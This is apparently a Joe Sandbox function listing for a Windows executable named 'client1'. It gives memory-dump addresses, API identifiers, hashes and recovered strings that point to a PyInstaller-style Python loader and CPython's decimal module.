                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID:
                                                    • API String ID: 4070488512-0
                                                    • Opcode ID: a9f1dad40c5644c1829df854b35cf2cff202b4769108a1d535aac39d904cb9be
                                                    • Instruction ID: fcc2753484b5f486a54e18bddd1f7662d5bede607d47f748dcb017644e45245b
                                                    • Opcode Fuzzy Hash: a9f1dad40c5644c1829df854b35cf2cff202b4769108a1d535aac39d904cb9be
                                                    • Instruction Fuzzy Hash: FAD1AE26A0878286E730BF35D9411F9A2AAFF85B94FD04136EE2D476C5DF3CE8418760
                                                    Function 00007FF79F639AE4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction ID: d38e4c0a79f0dbfa6df830ab3b98509657511f2034abe3d7e4a29a7db12c421b
                                                    • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction Fuzzy Hash: 8E315E32618B8196EB70AF35E8802EEB3A9FB85764F940135EA9D43B95DF3CD145CB10
                                                    Function 00007FF79F6409B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: 0bdd7a8416f1e28eb8c09c6b5c037a8b7871395a979be626bc7410ef92a9cb5d
                                                    • Instruction ID: 572fa503d9efa88cd8877b8e3ca50bbdc41208b686956940698c84aeaa251ad0
                                                    • Opcode Fuzzy Hash: 0bdd7a8416f1e28eb8c09c6b5c037a8b7871395a979be626bc7410ef92a9cb5d
                                                    • Instruction Fuzzy Hash: B2B18222B187E691EA70FB31D4006F9A36AEF45BE4F945131EA6E07B85DE7CE441C720
                                                    Function 00007FF79F64509C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                      • Part of subcall function 00007FF79F6447E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447FC
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID:
                                                    • API String ID: 3458911817-0
                                                    • Opcode ID: 8dda7e1bb43cce3069c61b2343a9d469707a009ccb87a98b23344d3931a91aef
                                                    • Instruction ID: a796102b552945bb7b714767cf37b22a4ce92422f55e44ceb41ad888243889cb
                                                    • Opcode Fuzzy Hash: 8dda7e1bb43cce3069c61b2343a9d469707a009ccb87a98b23344d3931a91aef
                                                    • Instruction Fuzzy Hash: A5515E32A187C286E730FF35E9815E9E76ABB49784FC44136EA6D43695DF3CE4018B60
                                                    Function 00007FF79F623DF0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                    • API String ID: 190572456-3109299426
                                                    • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction ID: 1569068ba6056d29c4952f7f3de6d42d44f31310c0c16f252f5e785b39ce0af7
                                                    • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction Fuzzy Hash: 1E42D864A0DB8391FA75FB34EC801F4A2AFAF44794BD45135C86D462A4EF7CB558C322
                                                    Function 00007FF79F6255D0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 2238633743-1453502826
                                                    • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction ID: b30a9a20e4738194fb40c84eba7b36943a02debceca7de32295cc50003b78bbb
                                                    • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction Fuzzy Hash: AAE1D760A09B8390FA75FB35A9941F4E3BFAF047A4BD45135C82E46764EF7CA5488332
                                                    Function 00007FFBAB4A2050 Relevance: 77.5, APIs: 43, Strings: 1, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_$Item$Dict_String$Attr$PackTuple_$Err_$Vectorcall$Type_Unicode_Withstrcmp$CallCompare$AllocArgsCalculateClearErrorFastFromFunctionGenericMergeMetaclassObjectOccurredReadyTrue
                                                    • String ID: <module>
                                                    • API String ID: 903524036-217463007
                                                    • Opcode ID: 8ad75d919c70f29923dc5d0feda9fa1aff1ccae90574155bf330c4cecec01ce6
                                                    • Instruction ID: 8134840f4c49689f651df6ab4156ed76dc4a9649129e18653ce7feb7d059489c
                                                    • Opcode Fuzzy Hash: 8ad75d919c70f29923dc5d0feda9fa1aff1ccae90574155bf330c4cecec01ce6
                                                    • Instruction Fuzzy Hash: 5832F2F6A0BE1281EA169B76E8902B863A4BF59B94F04C13DCD6D077B4DF3CA4659301
                                                    Function 00007FFBAB4913B0 Relevance: 60.0, APIs: 20, Strings: 14, Instructions: 487stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Dict_Format$ItemString$DeallocErrorNextOccurredWith$EqualSliceTuple_Unicode_strchr
                                                    • String ID: %.200s%s missing required argument '%s' (pos %d)$%.200s%s missing required keyword-only argument '%s'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%U' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%s') and position (%d)$at least$at most$exactly$function$keyword $keywords must be strings$this function
                                                    • API String ID: 3559638176-2999033026
                                                    • Opcode ID: 4d540e1895a9c3ffedcbc81b3114074a3911625cd29c2936832c9cb15c91a01f
                                                    • Instruction ID: 4511fee8e162fcc2eefdfc5832046263043bcf5f75111a88debfbf9624c81947
                                                    • Opcode Fuzzy Hash: 4d540e1895a9c3ffedcbc81b3114074a3911625cd29c2936832c9cb15c91a01f
                                                    • Instruction Fuzzy Hash: 162260B1A0EA8695EB668F36E4802BD73A0FB84B84F548039DE9E43674DF3CE545D700
                                                    Function 00007FFBAA706EB8 Relevance: 49.2, APIs: 18, Strings: 10, Instructions: 226COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$String$CompareLong_OccurredUnicode_With$DeallocLongMem_SizeTuple_$FreeMallocMemorySsize_t__stdio_common_vsprintf
                                                    • String ID: %lli$Inf$NaN$argument must be a sequence of length 3$coefficient must be a tuple of digits$exponent must be an integer$internal error in dec_sequence_as_str$sNaN$sign must be an integer with the value 0 or 1$string argument in the third position must be 'F', 'n' or 'N'
                                                    • API String ID: 3043890741-2922413049
                                                    • Opcode ID: 27c374245cbc951bbb9664482781b91c9a06e90aa74aacb636386183bdd97e19
                                                    • Instruction ID: 77b1dd3bcfe36c75f767c8ba6533047c4592ebb27d617f78aeb3c0bfeef38f42
                                                    • Opcode Fuzzy Hash: 27c374245cbc951bbb9664482781b91c9a06e90aa74aacb636386183bdd97e19
                                                    • Instruction Fuzzy Hash: A7A19FA1A0EA46E1EA278F34D45027B2BE9AF54B95F4441B2DD1E123A1EE3DE447C321
                                                    Function 00007FFBAA6F2AE8 Relevance: 47.6, APIs: 16, Strings: 11, Instructions: 374COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_String$FreeMem_Unicode_$Arg_ContextDecodeParseSizeTupleVar_memmove
                                                    • String ID: 0$O|O$decimal_point$format arg must be str$format specification exceeds internal limits of _decimal$grouping$invalid format string$invalid override dict$optional argument must be a dict$thousands_sep$unexpected error when rounding
                                                    • API String ID: 2652371118-3843118078
                                                    • Opcode ID: 41669f6f088280e2a45deb123ca613d6ccbc35c48b2e744dfb7242da67ea136d
                                                    • Instruction ID: 902fc3da756e49e3e1fa3c5c05a2cb700107849dfb0dbac9691dd47a1818dbee
                                                    • Opcode Fuzzy Hash: 41669f6f088280e2a45deb123ca613d6ccbc35c48b2e744dfb7242da67ea136d
                                                    • Instruction Fuzzy Hash: 3D0294A1A0AA42C1FA568F39D8501BE67A8FB44B94F141172DE5D176A8DF3CE44BCF20
                                                    Function 00007FFBAA709530 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Long_OccurredSsize_t$List_$String$ItemSize
                                                    • String ID: internal error in context_setround$internal error in context_setstatus_list$internal error in context_settraps_list$valid range for Emax is [0, MAX_EMAX]$valid range for Emin is [MIN_EMIN, 0]$valid range for prec is [1, MAX_PREC]$valid values for capitals are 0 or 1$valid values for clamp are 0 or 1$valid values for signals are: [InvalidOperation, FloatOperation, DivisionByZero, Overflow, Underflow, Subnormal, Inexact, Rounded, Clamped]
                                                    • API String ID: 2053550274-3788598963
                                                    • Opcode ID: 11b1f73e564ec631509256df91c7cfde50a0b1643e7355f9badffc7b3b7e2db2
                                                    • Instruction ID: e02843792abc577c7d1ea36b8edf1752b81e4fd914bd8799339cdf50655cbbcd
                                                    • Opcode Fuzzy Hash: 11b1f73e564ec631509256df91c7cfde50a0b1643e7355f9badffc7b3b7e2db2
                                                    • Instruction Fuzzy Hash: FFB14FA1B0B602D2EA568F35E4402776799BF44BA4F1446B6DD2D563E0DE3EE887C320
                                                    Function 00007FFBAB49B060 Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 318COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_Vectorcall$ContainsErr_FormatFromLong_MethodNumber_Set_Ssize_tSubtypeType_
                                                    • String ID: bool$feed$set$str$str or None
                                                    • API String ID: 2422131722-82482222
                                                    • Opcode ID: 5e1e687f1311e2cca4dc8f8691661f7225f9f5edac01d59bea97401bbb47080d
                                                    • Instruction ID: 6cc998f4e3139c3551e5d2a548001314b8fc9d67a2be30829c97b95ab7e1b20a
                                                    • Opcode Fuzzy Hash: 5e1e687f1311e2cca4dc8f8691661f7225f9f5edac01d59bea97401bbb47080d
                                                    • Instruction Fuzzy Hash: C9E15DF1A0BA1385EA229F76E8912BD27A1EF45B94F44C439DE7E077B5DE2DE4408301
                                                    Function 00007FFBAB498CA0 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
                                                    • String ID: bool$feed$set
                                                    • API String ID: 588643045-561237756
                                                    • Opcode ID: ffce80187a2194d36b121a22c23bc03d64daf0a46aa4c609272156cc88328f9b
                                                    • Instruction ID: df2245f1c8259c7ec688d791951c7b998571d1f9793b18802eab94f6b6a0e2b6
                                                    • Opcode Fuzzy Hash: ffce80187a2194d36b121a22c23bc03d64daf0a46aa4c609272156cc88328f9b
                                                    • Instruction Fuzzy Hash: E7C109B1A0BA0381FA629B3AE89527D67A1AF55BC4F48C139DE3D077B5DF2CE4408351
                                                    Function 00007FFBAA6FE4E0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
